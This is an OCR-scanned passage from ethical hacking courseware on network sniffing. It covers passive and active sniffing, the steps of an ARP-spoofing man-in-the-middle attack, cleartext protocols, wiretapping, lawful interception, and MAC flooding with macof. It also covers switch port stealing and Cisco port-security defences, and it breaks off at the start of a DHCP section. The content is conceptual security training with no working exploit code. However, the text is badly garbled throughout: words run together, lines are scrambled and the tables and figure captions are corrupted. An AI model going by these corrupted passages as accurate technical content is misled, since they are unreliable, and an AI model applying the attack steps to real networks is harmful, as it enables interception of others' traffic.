Sniffing
Passive
Passivesniffing
involvessending
no packets.
It simply and monitors the packets
captures
flowing A packet
i n thenetwork. snifferaloneis not preferred
foran attackbecause
it works
onlyin a commen collisiondomain.A common collisiondomainis the sector of the network
that is not switchedor bridged (i.e.,
connectedthrough a hub). Common collisiondomainsare
presenti n hub environments. A networkthat uses hubs to connect systemsu ses passive
sniffing. In suchnetworks, all hostsi n the networkcan see all the traffic. Hence,
it is easyto
capture trafficthroughthe hubusingpassivesniffing,

Attacker Hub
8.3:Passive
Figure siting

ical andCountermensores
Mackin ©by E-Comel
Copyright
 use the following
Attackers passivesniffing
methods
to gaincontrolover a targetnetwork:
=
Compromising physical security:
An attackerwho succeedsi n compromisingthe
physical of a targetorganization
security with a laptop
can walk into the organization
and try to pluginto the network and capturesensitive informationabout the
organization.
Using
a Trojan havein-builtsniffing
horse:Most Trojans capability.
An attackercan
installtheseon a victim'smachineto compromise it. After compromising
the victim's
theattacker
machine, snifferandperform
can installa packet sniffing,
Most modernnetworksuse switchesinsteadof hubs.A switcheliminates
the riskof passive
sniffing.
However, to active sniffing.
a switchis stillvulnerable

Note: Passivesniffing
provides
significant
stealthadvantages
over active sniffing.

ActiveSniffing
Activesniffingsearchesfor trafficon a switchedLANbyactively injectingtrafficinto it. Active
sniffingalsorefersto sniffingthrough a switch.In active sniffing,the switchedEthernetdoes
not transmit informationto all the systems connectedthrough LANas it doesin a hub-based
network.For this reason, a passive snifferis unableto sniff data o n a switchednetwork.It is
easyto detectthesesniffer programsandhighly difficultto performthistypeofsniffing,
Switches examine datapackets forsource anddestinationaddresses andthen transmit themto
the appropriate destinations. Therefore, it is cumbersometo sniffswitches.
However, attackers
can actively injectARPtraffic into a LANto sniffarounda switchednetworkand capturethe
traffic,Switches m aintain their own ARPcachei n Content Addressable Memory (CAM). CAM is
a special typeof memorythat maintains a recordof whichhostis connectedto whichport.A
snifferrecordsall the informationvisibleon the networkfor future review. An attackercan see
allthe information in the packets, including datathat shouldremain hidden.
To summarize the typesof sniffing:
passivesniffing
doesnot sendanypackets;
it onlymonitors
the packetssent byothers.Active sniffinginvolvessendingout multiple
network probes to

The
access
identify
points.
following
of
different
is
sniffing
techniques:
alist active
+

+
MAC flooding
DNSpoisoning
+

+
poisoning
ARP
DHCP
attacks
Switchportstealing

Spoofing attack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =

oS
Sost ot

How an AttackerHacksthe Network Using

Sniffers
Attackersuse sniffingtoolsto sniff packets
and monitor networktraffic on a targetnetwork.
The stepsthat an attacker followsto makeuse of sniffersto hacka network are illustrated
below,
Step 1:Anattackerwhodecidesto hacka networkfirstdiscovers
the appropriate
switch
to access the networkand connects a systemor laptop
to one of the portson the
switch,

ar a
Figure
8.4:a switch
Discovering t o access thenetwork

Step2: An attackerwho succeedsi n connectingto the network tries to determine

networkinformation of the networkbyusingnetworkdiscovery
suchas the topology
tools.

gute 85: Using

scovery
network toolst o learntopology

Modul
8 1085
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 the networktopology,
Step3: Byanalyzing the attacker
identifies
thevictim’s
machine
to targethis/her
attacks

So 3 72 a

St of af
86:
Figure Mentivngthevet's machine
@targetmachineuses ARPspoofing
Step4: An attackerwho identifies techniques
to
sendfake(spoofed)AddressResolutionProtocol(ARP)
messages.

Su. Mitt
cnn
BY
Attacker sendingfakeARPmessage
Figure8:7;
Step5: The previousstephelpstheattackerto divertall thetrafficfromthe victim's
‘computer Thisis a typical
to the attacker'scomputer. man-in-the-middle (MITM)typeof
attack

Step6:
88:the
Now,the attackercan
traficto
the
attacker
Figure Relracting
packets
see all the data sent andreceivedbythe victim,
Theattackerc an now extract sensitive informationfromthe packets,
suchas passwords,
usernames,creditcarddetails, andPINs.

ae
sensitive information
Figure89:Attackerextracting
a

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ProtocolsVulnerable to Sniffing
‘Telnet

and
Rlogin
Keystrokes
ining
andpasswords
tet
usernames
are sentin ear
|G:Passwords
and
data
are
sent
in
(©Dataissentin
deartont Passwords
anddataare sent in
sloartont

ProtocolsVulnerableto Sniffing
Thefollowing
protocols
are vulnerableto sniffing.
Themain reason for sniffing
theseprotocols
is to acquire passwords.
TelnetandRlogin
Telnet is a protocolusedfor communicating with a remote host (viaport 23)on a
networkusinga command-line
machineremotely
therefore,
via a TCP
datatraveling
terminal.rlogin
connection. Neitheroftheseprotocols
betweenclientsconnectedthrough
to
enablesan attacker loginto a network
providesencryption;
any of theseprotocols
are
in plaintext and vulnerableto sniffing. Attackers can sniff keystrokes, including
usernames andpasswords.

HTTP
Due to vulnerabilitiesin the defaultversion of HTTP,websitesimplementing HTTP
transferuser dataacross the networki n plaintext,
whichattackerscan readto stealuser
credentials.
SNMP
Simple
Network Management is a TCP/IP-based
Protocol(SNMP) protocol
usedfor
exchanging managementinformationbetweendevicesconnectedon a network.The
first version of SNMP(SNMPvi) does not offerstrongsecurity,
which leadsto the
transferof datai n a cleartextformat.Attackersexploit
the vulnerabilitiesi n this version
to acquirepasswords in plaintext.

ical andCountermensores
Mackin ©by E-Comel
Copyright
SMTP
Simple Mail TransferProtocol(SMTP) is usedfor transmittingemailmessages over the
Internet. In most implementations,
SMTPmessages are transmittedi n cleartext,
which
enablesattackers plaintext
to capture passwords. Further,SMTPdoesnot provide any
protection sniffing
against attacks.
NNTP
Protocol(NNTP)
NetworkNewsTransfer distributes, andposts
inquiresinto, retrieves,
news articlesusinga reliablestream-based
transmission of news amongthe ARPA.
Internet community. However,this protocolfailsto encryptthe data,whichallows
attackersto
PoP
sniff
sensitive information.

PostOfficeProtocol(POP) allowsa user’s

workstation to accessmail froma mailbox
A user can sendmail from the workstationto the mailboxserver via SMTP.
server.
can easily
‘Attackers sniffthedataflowingacrossa POPnetworki n cleartextbecauseof
the protocol’s
weaksecurityimplementations
FTP
File TransferProtocol(FTP) enablesclients to sharefiles betweencomputers in a
network,Thisprotocol failsto provide
encryption; therefore,attackerscan sniff data,
including byrunningtoolssuchas Cain & Abel.
user credentials,

ap
Internet Message AccessProtocol(IMAP) allowsa client to access and manipulate
electronicmail messages on a server. Thisprotocol offers inadequatesecurity,which
allowsattackersto obtaindataanduser credentialsi n cleartext,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 in the DataLink Layer
Sniffing of the OSIModel
|& snitlers
operateatthedatalinkayeroftheOSImode!
|G. Networking inthe OS!m odeare designed
layers to workindependently
ofeachother i a sifer sits data

the ofthe
sniffing
Inthedatalinkayer, upperOS!layers willnot beaware

plication feet Application

Presentation Presentation

Tansport ‘Transport

Inti
DataUnk
compromise
Dataunk

Prysicl Physical

in the DataLink Layerof the OSIModel

Sniffing
TheOS!modeldescribesnetworkfunctionsas a series of seven layers.
Eachlayerprovides
services to the layer

Thedatalinklayer
aboveandreceives
is thesecond layer
services
fromthe layer below.
ofthe OS!model.In thislayer, datapackets
are encoded
at the datalink layer
anddecodedinto bits.Sniffersoperate packets
andcan capture fromthis
layer.
Networking layers in the OSImodela re designed to workindependently
ofeachother;
thus,if a sniffersniffsdata i n the datalink layer,
the upper OS!layers
will not be aware of the
sniffing,

Application plication

Presentation Presentation

Session Protocot/Poms
Session

Transport

Figure8.20:
inthe
Sniffing dat layer
link oftheOS made!

ical andCountermensores
Mackin ©by E-Comel
Copyright
 HardwareProtocolAnalyzers

©
ttc dt
les
pact decodeit andanaests conten basedon certain predetermined

@ sown sce
nd tt ch aca pie hohe al e

HardwareProtocolAnalyzers
hardwareprotocol
‘A analyzeris a devicethat interprets traffic passingover a network.It
captures signalswithout alteringthe traffic segment.
Its purposeis to monitor networkusage
andidentify maliciousnetworktrafficgenerated byhacking softwareinstalledon the network.
It captures a data packet,decodesit, and analyzes its content according to predetermined
rules.It allowsan attackerto see the individualdata bytes of eachpacket passingthroughthe
network.
Compared analyzers,
to softwareprotocol hardwareprotocol
analyzers of
are capable
m ore data without packet
capturing drops at the time of dataoverload.Hardwareprotocol
analyzers
providea wide rangeof networkconnection options varyingfrom LAN,WAN,and
wirelessto circuit-based telconetworklines.They are capable
of displayingbusstatesandlow-
level events such as high-speed negotiation(K/Jchirps), transmission errors, and
retransmissions,The analyzers provideaccurate timestamps of the captured traffic. However,
hardwareanalyzers are more expensive andtend to be out of reachfor individualdevelopers,
hobbyists,andordinary hackers
Hardwareprotocol
analyzers
fromdifferentmanufacturers
include:
=
Voyager Max ProtocolAnalyzer
Source:https://teledynelecray.com
TheVoyager Max analyzer
platform accurate andreliable
provides of USB4and
capture
Thunderbolt3 protocols for fastdebugging,
analysis,
andproblem-solving.
Voyager M4x
featuresthe highest-fidelity probedesign reliability
andprovidesunmatched when
testingdevicesat thefull USB4Gen3x2(40Gb/saggregate)
speed,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure Mx Protocol
8.1: Voyager Analyzer
2X NSS40AAgilent
ProtocolAnalyzer
Source:https://www.valuetronics.com
The Agilent and deployment
N2X is a test solutionfor testingthe development of
network services for convergingnetworkinfrastructures.Serviceproviders,
network
(NEMs},
equipmentmanufacturers andcomponent can verify
manufacturers service
attributes of entire networksend-to-end, while also isolating problems down to
individualnetworking devicesandsubsystems. Two differenttypesof cardscan be
configured simultaneously,allowing
for test scenarios that use a combinationof port
types.

Figure8.12:
N2XNSSAOA Agilent Analyzer
Protocol
Someexamples
of hardwareprotocolanalyzers
are listedbelow:
+
Keysight (https://www.keysight.com)
£29608
=
Analyzer
STINGAProtocol (https://utelsystems.com)
+
NETSCOUTOneTouchATNetworkAssistant(https://enterprise.netscout.com)
NETSCOUTOptiView Tablet(https://enterprise.netscout.com)
XGNetworkAnalysis
Agilent
(Keysight)
Technologies (https://www.microlease.com)
8753ES

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SPANPort

"©ASPANport
isa por thats configured
lofeverypacket
thatpasses through »
to receive copy
aswiteh

SPANPort
SwitchedPort Analyzer (SPAN) is a Ciscoswitchfeature,alsoknownas “port mirroring,―
that
monitors networktraffic on one or more ports on the switch.A SPANportis a portthat is
configured to receive a copyof everypacket that passesthrough a switch.It helpsto analyze
and debug data,identify errors, and investigate unauthorizednetwork access. Whenport
mirroringis on, the networkswitchsendsa copyof the networkpackets fromthe source port
to the destinationport,whichstudiesthe networkpackets with the helpof a networkanalyzer.
Therecan beone or more sources,but thereshouldbe onlyone destination porton theswitch.
Sourceportsare the portsfor whichnetworkpackets are monitoredandmirrored.Theuser can
simultaneously monitor thetrafficof multiple ports,suchas thetrafficon all the portsof a
specificvirtuallocalarea network(VLAN).

erates
ale.
Figure8.13: ofSPAN
Working

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Wiretapping
mentoring
and
Internet
ivetapingistheprocesofthe f telephone conversations
by a thd party

two
phones
information
between
Wallowa attaches
orhoss ontheInemet
to monitor,intercept,
acces and recordinformation
c ontained
i na datalw in

‘otive
WiretappingPassive
Wiretapping
ommunication and
cords,
ates,
and records
the
1: temontors, © only monitors
als dataint the
injects tee and collects
knowledee
or rahe ‘Types
of
regarding
thedataRcontans
‘ering
Wiretapping

wy ~G
Wiretapping
Wiretapping, or telephone tapping,refers to the monitoringof telephone or Internet
conversations bya third partywith covert intentions. To perform the attackerfirst
wiretapping,
selectsa targetpersonor hoston the networkto wiretapandthen connects listening
(hardware, software,
two targetphones
or a combination
or hosts.Typically,
of both)
device
to the circuit carryinginformationbetweenthe
theattackerusesa smallamount of the electricalsignals
a
generated bythe telephone wires to tap the conversation. Thisallowsattackersto monitor,
access,and record information
Intercept, containedin the data flow i n a communication
system.
tapping
Methods

The
following
+
ways
perform
are

of lines
to wiretapping
Theofficialtappingtelephone
*
of telephone
Theunofficialtapping lines
+

theRecordingconversation
Direct linewiretap
Radiowiretap

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of Wiretapping.
Types
Thereare two typesof wiretapping that an attackerc an use to monitor,record,
andeven alter
the data flow i n the communication system.
=
ActiveWiretapping
In hackingterminology, is an MITM attack.Thisallowsan attackerto
active wiretapping
monitor andrecordthetrafficor dataflow i n a communication system.Theattackerc an
alsoalteror injectdatainto communicationor traffic.
Wiretapping
Passive
Passive
wiretapping is snoopingor eavesdropping.
Thisallowsan attackerto monitor
andrecordtraffic.Byobservingtherecorded
trafficflow,theattackercan snoopfora
password
or otherinformation.

Note: Wiretapping
isa criminaloffense or
without a warrant the consent of the people
andis punishable
i n most countries,
conducting
depending
the conversation
on the country's
law.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 LawfulInterception
©Lawl inerceptionrefersto lepllyintercepting
‘he
traditional
elecommunications,
datacommunication
Voleeove internetProtocol two
between endpons fr surveillance
dt, sndmultiservice networks
(ValP),
on

A
an

‘Lawful Interception
Lawful interception (LI)refers to legallyintercepting
data communication between two
endpoints for surveillanceon traditional telecommunications, VoIP,data,and multiservice
networks.LIobtainsdatafroma communication networkfor analysis or evidence.Thisis useful
i n activities like infrastructuremanagement and protection,as well as cybersecurity-related
issues. Here,the network operator or service providerlegallysanctions access to private
networkdatafor monitoring privatecommunications like telephone callsandemailmessages.
Suchoperations are carried out bylawenforcement agencies (LEAS).
Thistypeof interception is necessary onlyto monitor messages exchanged on suspicious
channelsi n which the users are engaged i n illegal
activity.Countries aroundthe world are
makingstridesto standardize thistypeof procedure for interception.
Thefigure showsthe telco/ISPlawfulsolutionprovided bythe DecisionComputer Group. The
solutionconsists of one tap/access switchandmultiple systemsfor the reconstruction of
intercepteddata.Thetap/access switchcollectstrafficfromthe Internet service provider (ISP)
network,sorts thetrafficbyIP domain, andserves it to E-Detective (ED) systemsthatdecode
and reconstruct the intercepted
traffic into its original format.Thetool performsthiswith the
helpof supportingprotocols suchas POP3, IMAP,SMTP,P2P and FTP,and telnet. The
CentralizedManagement Server(CMS) manages all the EDsystems.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

a 7
a| Creuermee
a Dette
ogee fn

MAC Attacks
SniffingTechnique:
use various sniffing
Attackers techniques,
suchas MACattacks,
DHCPattacks,
ARPpoisoning,
spoofing
attacks,
and ONSpoisoning, to stealand manipulate
sensitive data.Attackersuse
thesetechniques networkbyreading
to gaincontrolover a target datapackets
captured and
thenusing that informationto breakinto the network.
MACattacksor MACflooding.
Thissection discusses Attackersuse the MACflooding
technique
toforcea switchto act as a hub,so that they
c an easily
sniffthetraffic.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 MACAddress/CAMTable

|G tachswitchhas.fees dynamic Memory

ContentAddressable (CAM)
table
|G TheCAMtablestores information
virtualL AN(VLAN)
parameters
such
addresses
avalable
ax MAC portswit thelrassociated
on physical

CAM
Table
255 0488d24.123¢ Gi/2
com te DynamicYes 0
5 as23dl45astsDymamicYes 0 Gi2/s
alar|oe]as|oe]oal alex
5 e232sert8e3 Dynamic Yes 0 Git/s

all
MACAddress
Fa
AMAC addressuniquely identifieseachnodeof a network.Eachdevicein the networkhasa
MAC address with a physical
associated porton the networkswitch, whichmakesi t possibleto
designate a specific
singlepointof the network.MACaddresses are usedas networkaddresses
for most IEEE802 networktechnologies, includingEthernet.Logically,
the MAC protocol
i n the
(SI referencemodelu sesMACaddresses for informationtransfer.
AMAC addresscomprises48 bitsthat are splitinto two sections, eachcontaining 24 bits.The
firstsection contains the ID numberofthe organizationthatmanufactured theadapter andis.
calledthe organizationally uniqueidentifier(OUI).Thenext sectioncontains the serialnumber
assigned to the NIC adapter andis calledthe NIC specific.
TheMACaddress contains 12-digit
hexadecimalnumbers, dividedinto threeor six groups.The
first six digits
indicatethe manufacturer,
whilethe next six digitsindicatethe adapter’s
serial
number.Forexample, consider
the MACaddressD4-BE-D9-14-C8-29. Thefirstsix digits,
i.e.,
DA4BEDS, indicatethe manufacturer(Dell,
Inc.),and the next six digits,14C829, indicatethe
of
serialnumber theadapter.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 3 Bytes 3 Bytes

Organizationally
Unique NetworkInterface
dentitier (OU!) contr
ler(NIC)
Specific

|a8 a7 a6 aS a4 a3 a2 al

0: Unicast
1: Multicast

0: Globally
unique
1: Locally
administered
MACaddress
Figure8.15:
CAMTable
‘A
CAM table is a dynamic
table of fixed-size.It stores informationsuchas MACaddresses
available
ports
o n physical along
sendsdata to anothermachinei n a network,
searches
associated
with VLANparameters
the data passesthrough
for the destinationMACaddress(located i n the Ethernetframe)
with
them. Whena machine
the switch.Theswitch
i n its CAMtable,
and
once the MACaddress it forwards
i s found, data to the machinethrough the portwith which
the MAC addressis bound.Thismethodof transferring data i n a switchednetwork is more
secure thanthat of a hub-based network,in whichthe hubforwards the incomingtrafficto all
‘the
machines i n the network.

vlan MACAdd Type Learn Ports

255
5
| 00d3.ad34,123g Dynamic
9823.4445.45t6 Dynamic
Gis/2
Gifs
5 €123.23er.t5e3 Dynamic Gi/6

ical andCountermensores
Mackin ©by E-Comel
Copyright
 HowCAMWorks

a]
~ =. i 2
a

seas
ee Hace

How CAMWorks
A CAMtable refersto the dynamic formof content andworkswith an Ethernetswitch.The
Ethernetswitchmaintains connections betweenports, andthe CAM table keeps trackof MAC

more MAC addresses than it can hold,

to ensure the deliveryof data to the intendedhost.Attackersexploit
Isdoes
addresslocationson the switch,but thetable is limitedin size. If the CAMtable floodedwith
the switchwill turn into a hub.TheCAM table this
this vulnerability
in the
CAM table to sniff networkdata. An attackerwho can connect to the sharedswitchof the
Ethernetsegment can easily sniffnetworkdata,
Referto the diagrams
Machine of
the working
B,andMachineC,each holding MAC addresses
MACaddressA,wants to interact with MachineB.
are
of the CAMtable.Threemachines shown:MachineA,
A,B,and C. MachineA,holding
the

MachineA broadcasts
an ARPrequestto theswitch.Therequest contains the IPaddress
of the
targetmachine(Machine8), alongwith the source machine's (Machine A)MAC and IP
addresses.
Theswitchthen broadcasts
this ARPrequestto all the hostsi n the networkand

for
waits the reply.

en sl

8.16:Working
Figure
AARP
for 8

ofCAMtablestep-1

ical andCountermensores
Mackin ©by E-Comel
Copyright
Machine the target/destination
B possesses so it sendsan ARPreply
IP address, along
with its
MAC address.TheCAM table stores this MACaddressalong with the port on whichthis
machine
is connected

of CAMtablestep:2
8.17Working
Figure
Nowthe connection is successfully
established,andMachineA forwardsthe traffi
8,whileMachineC is unableto see thetrafficflowing
betweenthem.

TraficA >o

Figure
of
CAM
8.18:Working table step'3

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WhatHappens
When a CAMTableIs Full?

wl change
“This
ikeshut
up
|@OncetheCAMtablefils
on
a ARP
theBehavior
ste, addtional
ofthe switchto resettits
requesttrafic floods

learning broadcasting
mode, every
on
everyport

on
theswitch

port

‘This
attackw l
also of
filltheCAMtables adjacent
switches

8
wh

Happens
‘What when a CAMTable is Full?
discussed,
‘As a CAMtable contains networkinformationsuchas MACaddresses
availableon
physical
switchportsand associated A CAM table’s
VLAN parameters. limited size rendersit
susceptibleto attacksfromMACflooding, whichbombardsthe switchwith fake source MAC
addressesuntil the CAMtable is full. Thereafter,
the switchbroadcasts all incomingtraffic to all
ports.Thiscausesthe switchto reset to its learningmode,causingthe switchto broadcaston
everyportsimilarto a hub,thereby enabling
the attackerto monitor the framessent fromthe
Victimhostto
adjacent
switches
another
hostwithoutanyCAMtableentry.
This
attack
also
fills tables theCAM of

figure
‘The illustrateshow a CAM table can befloodedwith fake MAC addresses
to monitor the
framessent fromthe victim hostto anotherhostwithout anyCAMtable entry.
Yison
Poret
3

es
>e
wh
gee
Zion Ports Bh me

8.19:Flooding
Figure a CAM
table

ical andCountermensores
Mackin ©by E-Comel
Copyright
 MACFlooding
[©MAC ondng thelooding CAM
involves
tablewith fakeMACaddress of
the
and pals unt Ris
‘Mac
FloodingSwitches with macof
mac Unto

coeds random
tht pat oftheei

MAC and ares

Thesith thanacts a
paket al lmachines
therefore,
habbybroadest
onthe

the attackerscan
network, and
sniffthewai easly ysending CAM sore bles [131,000
1ods thesite’

bogus
MACerie

MAC Flooding
MACflooding is a techniqueusedto compromise the security
of networkswitchesthat connect
networksegments or devices.
Attackers use the MACfloodingtechniqueto forcea switchto
act as a hubso that theycan easily
sniffthetraffic.
In a switchednetwork, an Ethernetswitch contains a 2 CAMtable that stores all the MAC
addresses of devicesconnectedin the network.A switchacts as an intermediate device
betweenone or more computers i n a network.It looksfor Ethernetframes, whichcarry the
destination MACaddress; then,it talliesthisaddress withthe MACaddressi n its CAMtableand
forwardsthe traffic to the destinedmachine.Unlikea hub,whichbroadcasts data across the
network, a switch sendsdataonly to theintended recipient.Thus, a switchednetworkis more
secure compared to a hubnetwork.However, the size of the CAMtable is fixed, and as it can
store only a limitednumberof MAC addresses i n it, an attackermay sendnumerous fake MAC
addressto the switch,No problem occurs until the MACaddresstable is full. Oncethe MAC
addresstable is full,any further requests
fail-open mode,the switchstarts behaving
may forcethe
switchto enter fail-open
like a hubandbroadcasts
all the portsi n the network.Theattackerthen changes his/her
mode.In the
incomingtraffic through
machine’s
NIC to promiscuous
modeto enablethe machineto accept all the trafficentering i t. Thus,attackerscan sniffthe
traffic easily
andstealsensitive information.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Attacker

Switches
MacFlooding withmacof
820:
Figure MACfooting

Source:https://monkey.org

thereby
a
macofis Unix/Linux

facilitating
sniffing. Thistool floodsthe switch’s
floods
tool that is a partof the dsniffcollection.It
randomMACandIP addresses, causingsome switches the localnetworkwith
to fail and open in repeating
CAMtables(131,000
mode,
per min)by
sendingforged MACentries. When the MACtablefills up, andthe switchconverts to hub-like
operation,a n attackerc an monitor thedatabeing broadcast.

821:
Figure MACflooding
using

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SwitchPortStealing

tte
ibe seatcir te oes age
ces mm

on
SwitchPort Stealing
Theswitchportstealing
sniffing
technique
usesMACflooding
to sniffthe packets.
Theattacker
floodsthe switchwith forged gratuitous ARPpackets with the targetMACaddress as the source
and his/her own MACaddress a s the destination.A race conditionof the attackers flooded
packets andtarget hostpackets will occur, andthus, the switchhasto change its MAC address
to bind constantly betweentwo differentports.In this case,if the attackeris fast enough,
he/she will ableto directthe packets intendedfor the targethosttowardhisswitchport. Here,
the attackermanages to stealthe targethostswitchportandsendsan ARPrequest to this
switchportto discoverthe target host’s Whenthe attackergetsan ARPreply,
IP address. this
indicatesthatthetargethost'sswitchportbinding hasbeenrestoredandtheattackercan now
sniffthe packets sent towardsthe targeted host.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 2 Switch
Layer

‘Target

Attacker

Logical
Connection
RealConnection

gure 8:22:Switchportstealing
Assumethat thereare three machinesi n a network:Host A, the target’s
Host 8, andthe
attacker'sHost C.

Machine
Host
A
MACAddress
aa-bb-cc-dd-ee-ff
Address
WP
10.901

Host
8

Host
C
bb-ccxdd-ee-tfag
codd-ee-f-gg-hh
10.002
10.90.38

Table
of
three 82 Details hosts
ARPcacheandMACtable contain the following
Theswitch’s
in a network

values
MACTable

| Host
Address|
Vian

255,
MAC
A
Type
aabbceddee-ff
Learn
10.0.0.1
5
5
Host
Host || 8
¢
bb-ccddeesfee 1000.2
coddee-ffgg-hh 100.03
Table
£3:MACtable

ical andCountermensores
Mackin ©by E-Comel
Copyright
ARPCache
Mac
aa-bbccddeett
boce-ddeetheg
co-dd-ee-fh-eg-hh
“abe
8.4 ARPcache table
is a sniffing
1. Switchportstealing usedbyan attackerwhospoofs
technique boththe IP
addressandthe MACaddress machine(Host
of thetarget 8).
Machine MACAddress IPAddress

|
Host
Host8
aa-bb-ce-dd-ee-ff
bb-ccdd-eefrag
10.0.0.
1000.2

Host ¢ bb-codd-ee-fhge
Table
85: Switeh
10.0.0.2
with aspoofed
updated entry
The attacker'smachineruns a sniffer that turns the machine’sNIC adapter to
promiscuousmode.
HostA,associated withthe IP address wants to communicate with Host8,
(10.0.0.1),
associatedwith the IP address(10.0.0.2).
Therefore,host A sendsan ARP request(|
want to communicatewith 10.0.0.2,Whatis the MACaddress of 10.0.0.27)
Theswitchbroadcasts
thisARPrequest
to all themachines
i n thenetwork.
BeforeHost 8 (thetargetmachine)
can respond to the ARP request,
the attacker
to theARPrequest
responds an ARPreply
bysending the spoofed
containing MACand
IPaddresses(Iam 10.0.0.2,
andmy MACaddressis bb-cc-dd-ee-ff-gg),
Theattackercan achievethis bylaunching
an attacksuchas denialof service (DoS)
on
HostB,whichslowsdownits response.
NowtheARPcachei n the switchrecordsthe spoofed
MACandIPaddresses.
® mac
10001
100002
|| aabb-ccdd-eett
_bbccdd-ee-ttag
10002
|
ARPcache
Table 8.6:
bbccdd-eettag
updated
with spoofedentry

7. Thespoofed MACaddressof targetHost8 (bb-cc-dd-ee-ff-gg)

andthe portconnect to
C)andupdate
the attacker'smachine(Port theswitch’s
CAM table.Now,a connection is
established C)
betweenHostAandthe attacker'smachine(Host

ical andCountermensores
Mackin ©by E-Comel
Copyright
 MACAddress
HostA
Type
aabbccddeett
||
learn
10001
|| Age
0
|| Ports
Pora
Host8
Host€
bo-cedd-eettge10.002
bo-ccddeettge10.002
| || 0
0
|| Por®
Porc
8 .7:MACTobeupdatedwitha spoofed
Table entry
8. Now,the system willforwardall the packets
directedtowardsHostB to HostCthrough
Port C,ie., the attacker'smachine.
Thus,an attackercan
sniff
packets
the sent to Host B.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to DefendagainstMACAttacks

ee
a
a
een
Portsecurtycan b euredto restrict inbound
trafic
fromonlya elected set ofMAGaddressesandnit
MACeoding
tack

How to Defendagainst MACAttacks

Port security
is a featurethat identifiesandlimitsthe MACaddresses
of themachines
that can
accessthe port. If you assigna secure MAC address thenthe port will forward
to a secure port,
onlythe packets with source addresses insidethe groupof definedaddresses.
Asecurityviolation occurs
‘=
Whena port is configured as a secure port, andthe maximum numberof secure MAC
addresses
is reached
=
Whenthe MACaddressof the machinethat is attempting to accessthe portdoesnot

of
matchany the identifiedsecure MACaddresses
Oncethe maximum numberof secure MAC addresses on the port is set, the secure MAC
addresses tablein any of the following
are includedin an address threeways:
You can configure byusingthe switchport, port-securing
all secure MAC addresses the
interfaceconfiguration
MAC-address command,
Youcan allowthe portto dynamically
configure
secure MACaddresses
with the MAC

You can
of
addressesthe connected
configure
devices.
a number of addresses
and allow the rest to be dynamically
configured.
Port securitylimitsMACflooding sending
attacksandlocksdownports, an SNMPtrap.

shownin thefigure,
‘As the attackerfloodstheswitchCAMtableswithfakeMACaddresses
and
byturninga switchinto a hub.
thusthreatenssecurity

ical andCountermensores
Mackin ©by E-Comel
Copyright
 cosetereeeee
co-cnehddasea

Figute8.23
FlodingCAMtables
the number
Asshownin the figure, of MACaddressesallowedon the switchportis limitedto
one; therefore, are recognized
the MACrequests as flooding. locksdownthe port
Port security
andsends
an
SNMP
trap.
on
‘Only
MAC Addrose
Allowed theSwitch
P ort

Configuring
PortSecurity
be
on CiscoSwitch
Source:https://www.cisco.com
Stepsto restrict trafficthrough
Te
Figure8.24
Blocking
MACflooding

a portbylimiting
and identifying
MACaddresses
of the stations
allowedto accessthe port:
1. interface interface_id
Entersinterfaceconfiguration
modeand enters the physical
interfaceto configure,
for
example,gigabitethernet
3/1.
switchportmode access
Setsthe interface
modeas access;a n interface mode(dynamic
i n thedefault desirable)
cannot beconfigured
as a secure por.

switchport port-security
Enables on theinterface.
portsecurity
switchport port-security maximum value
Setsthe maximum number
3072;the defaultis 1 of secure
for
MACaddresses the interface.Therangeis 1 to

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ewitchportport-security violation (restrict | shutdown)
violation {restrict
Setsthe violationmode,the action to be takenwhen a security |
shutdown) is detected.

switchport port-security limit rate invalid-source-mac

Setsthe rate limit for badpackets.
switchport port-security mac-address mac_address
Entersa secure MACaddressfor the interface.Youcan use thiscommandto enter the
maximum number of secure MACaddresses,

ewitchport port-security mac-address sticky

sticky
Enables
end
on
learningthe interface.

Returnsto privileged
EXECmode.
10. show port-security address

your
Verifies entries.
to configure
Someadditionalcommands the Ciscoport
security
feature:
switchport port-security maximum 1 vlan access

Sets of
the maximum number
3072.Thedefaulti s 1
secure
for
MACaddresses the interface.Therangeis 1 to

switchportport-security aging time 2

Setstheaging
time
for
the secure port.
switchport port-security aging type inactivity
Thetypekeyword setsthe agingtypeas absoluteor inactive.

snmp-server enable traps port-security trap-rate 5

Controlsthe rate at whichSNMPtrapsare generated.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 HowDHCPWorks

(©OCPservers
TCP/IP
maintain information,
configuration

(© tcovdesadres configuration

to ONCP-enabled
sucha ald TC/IP
configuration
lens inthe formofa lete offer
valid
parameters,

@
°

DHCPAttacks
SniffingTechnique:
Thissection discusses various Dynamic Host Configuration Protocol(DHCP) attacks.ADHCP
attackis an active sniffingtechnique usedbythe attackersto stealand manipulate sensitive
data.Thissection describes howDHCP works,DHCP toolsusedforstarvation
starvation attacks,
attacks,rogue server attacks,anddifferentways to defendagainst DHCP attacks.
How DHCPWorks

is
DHCP a client-serverprotocol
that provides
the DHCPserver also provides
address,
to an IP host.In addition to the IP
an IPaddress
configuration-related
informationsuchas the default
gatewayand subnetmask.When 2 DHCPclient deviceboots up, it participates in traffic
broadcasting.
DHCP can assignIP configuration
to hostsconnecting
to a network.The distribution
of IP
configuration
to hostssimplifies
theadministrator's
workto maintain IPnetworks.
DHCPservers maintain TCP/IP configuration
information i n a databasesuchas valid TCP/IP
configuration
parameters,validIP addresses,
andduration oftheleaseofferedbytheserver. It
provides
addressconfigurationsto DHCP-enabledclientsi n the formof a leaseoffer.
‘Working
of DHCP:
1. Theclientbroadcasts
@DHCPDISCOVER/SOLICIT for DHCPconfiguration
requestasking
Information.
DHCP-relay
‘A the client requestand unicasts it
agentcaptures to the DHCPservers
available
i n thenetwork

‘A server unicastsDHCPOFFER/ADVERTISE,

DHCP whichcontains theclient’s
andserver's
MACaddresses

ical andCountermensores
